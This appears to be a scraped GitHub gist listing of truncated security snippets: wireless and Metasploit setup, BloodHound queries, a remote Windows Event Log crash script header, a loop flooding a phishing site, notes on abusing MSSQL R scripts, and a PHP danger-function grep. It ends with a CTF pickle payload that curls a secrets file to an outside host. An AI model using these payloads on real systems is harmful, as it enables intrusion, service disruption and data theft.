#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
- Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
Ricardo ricardojba
ricardojba
/ msfconsole.rc
Last active
February 26, 2024 22:54
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| set LogLevel 5 | |
| set ConsoleLogging true | |
| set SessionLogging true | |
| set TimestampOutput true | |
| features set dns_feature true | |
| features set postgres_session_type true | |
| features set mssql_session_type true | |
| features set mysql_session_type true | |
| features set wrapped_tables true | |
| features set fully_interactive_shells true |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- https://github.com/ealtili/Blog/blob/master/WindowsSandbox.md --> | |
| <!-- https://github.com/microsoft/Windows-Sandbox-Utilities --> | |
| <!-- https://github.com/damienvanrobaeys/Run-in-Sandbox --> | |
| <!-- http://www.systanddeploy.com/2019/06/run-file-in-windows-sandbox-from-right.html --> | |
| <!-- http://www.systanddeploy.com/2019/07/windows-sandbox-editor-update.html --> | |
| <Configuration> | |
| <VGpu>Default</VGpu> | |
| <Networking>Default</Networking> | |
| <MappedFolders> | |
| <MappedFolder> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "queries": [{ | |
| "name": "--https://github.com/ZephrFish/Bloodhound-CustomQueries/--", | |
| "queryList": [{ | |
| "final": true, | |
| "query": "" | |
| }] | |
| }, | |
| { | |
| "name": "Return All Azure Users that are part of the 'Global Administrator' Role", |
ricardojba
/ eventvwr_crash.py
Created
September 26, 2020 20:38
— forked from byt3bl33d3r/eventvwr_crash.py
Crash the Windows Event Log service remotely (needs admin privs)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Crash the Windows Event Log Service remotely, needs Admin privs | |
| # originally discovered by limbenjamin and accidently re-discovered by @byt3bl33d3r | |
| # | |
| # Once the service crashes 3 times it will not restart for 24 hours | |
| # | |
| # https://github.com/limbenjamin/LogServiceCrash | |
| # https://limbenjamin.com/articles/crash-windows-event-logging-service.html | |
| # | |
| # Needs the impacket library (https://github.com/SecureAuthCorp/impacket) |
ricardojba
/ trash.sh
Created
August 14, 2020 09:35
— forked from geek-at/trash.sh
The script used to trash a banking phishing site
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| while :; do | |
| verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1) | |
| pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1) | |
| ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))") | |
ricardojba
/ xor.py
Last active
July 6, 2020 11:05
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| def xor(data,key): | |
| return bytearray(((data[i]^key[i%len(key)]) for i in range(0,len(data)))) | |
| data = bytearray(open("my_magic_bytes.jpg.enc","rb").read()) | |
| # Known plaintext from wikipedia https://en.wikipedia.org/wiki/List_of_file_signatures - XOR the enc file with it first | |
| #key = bytearray([0xFF,0xD8,0xFF,0xE0,0x00,0x10,0x4A,0x46,0x49,0x46,0x00,0x01]) | |
| # 12 bytes key extracted from the file after the first above XOR | |
| key = bytearray([0x46,0xcc,0xf9,0xa5,0x71,0xf0,0xff,0xb1,0x7e,0x41,0xcb,0x84]) |
ricardojba
/ Wireless Penetration Testing Cheat Sheet.md
Created
April 27, 2020 15:40
— forked from dogrocker/Wireless Penetration Testing Cheat Sheet.md
Wireless Penetration Testing Cheat Sheet
ricardojba
/ gist:ab090df0b0c294f09940213e526e728f
Created
March 22, 2020 15:02
Executing R Scripts in MSSQL
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # original https://pastebin.com/zBDnzELT | |
| Starting with MS-SQL 2016 MS has allowed for the inclusion of the Microsoft R Server services, permitting the execution of R scripts in the MS-SQL environment. In order for this funcitonality to be enabled, the R services for SQL server component must be installed, the server must be reconfigured to permit sp_exectue_external_script, and a user must be granted the 'EXECUTE ANY EXTERNAL SCRIPT' permission; yes, all of this is becoming increasingly more common. | |
| Once these conditions are in place, SQL users will have R capabilities in their queries through the use of sp_execute_external_script(). | |
| This can be 'fun'.. | |
| Sample R query in MS-SQL (from MSDN): | |
ricardojba
/ php-egrep-sast-scan.sh
Created
September 3, 2019 10:51
— forked from mgeeky/php-egrep-sast-scan.sh
egrep expression to scan PHP sources for invocation of potentially dangerous functions.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| P="*" | |
| if [ -n "$1" ]; then | |
| P="$1" | |
| fi | |
| grep -E "\spassthru\(|\sexec\(|\spnctl_exec\(|\sproc_open\(|\spopen\(|\ssystem\(|\sshell_exec\(|\sregister_shutdown_function\(|\sregister_tick_function\(|\seval\(|\sexpect_popen\(|\sapache_child_terminate\(|\slink\(|\sposix_kill\(|\sposix_mkfifo\(|\sposix_setpgid\(|\sposix_setsid\(|\sposix_setuid\(|\sproc_close\(|\sproc_get_status\(|\sproc_nice\(|\sproc_terminate\(|\sputenv\(|\stouch\(|\salter_ini\(|\shighlight_file\(|\sshow_source\(|\sini_alter\(|\sfgetcsv\(|\sfputcsv\(|\sfpassthru\(|\sini_get_all\(|\sopenlog\(|\ssyslog\(|\srename\(|\sparse_ini_file\(|\sftp_connect\(|\sftp_ssl_connect\(|\sfsockopen\(|\spfsockopen\(|\ssocket_bind\(|\ssocket_connect\(|\ssocket_listen\(|\ssocket_create_listen\(|\ssocket_accept\(|\ssocket_getpeername\(|\ssocket_send\(|\sapache_get_modules\(|\sapache_get_version\(|\sapache_getenc\(|\sapache_note\(|\sapache_setenv\(|\sapache_request_headers\(|\sdiskfreespace\(|\sdisk_free_space\(|\sget_current_user\(|\sgetmypid\(|\sgetmyuid\(|\s |
ricardojba
/ 0xOPOSEC 0x71 Challenge
Created
February 8, 2019 15:15
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cposix | |
| system | |
| p0 | |
| (S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444' | |
| p1 | |
| tp2 | |
| Rp3 | |
| . | |
| FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!} |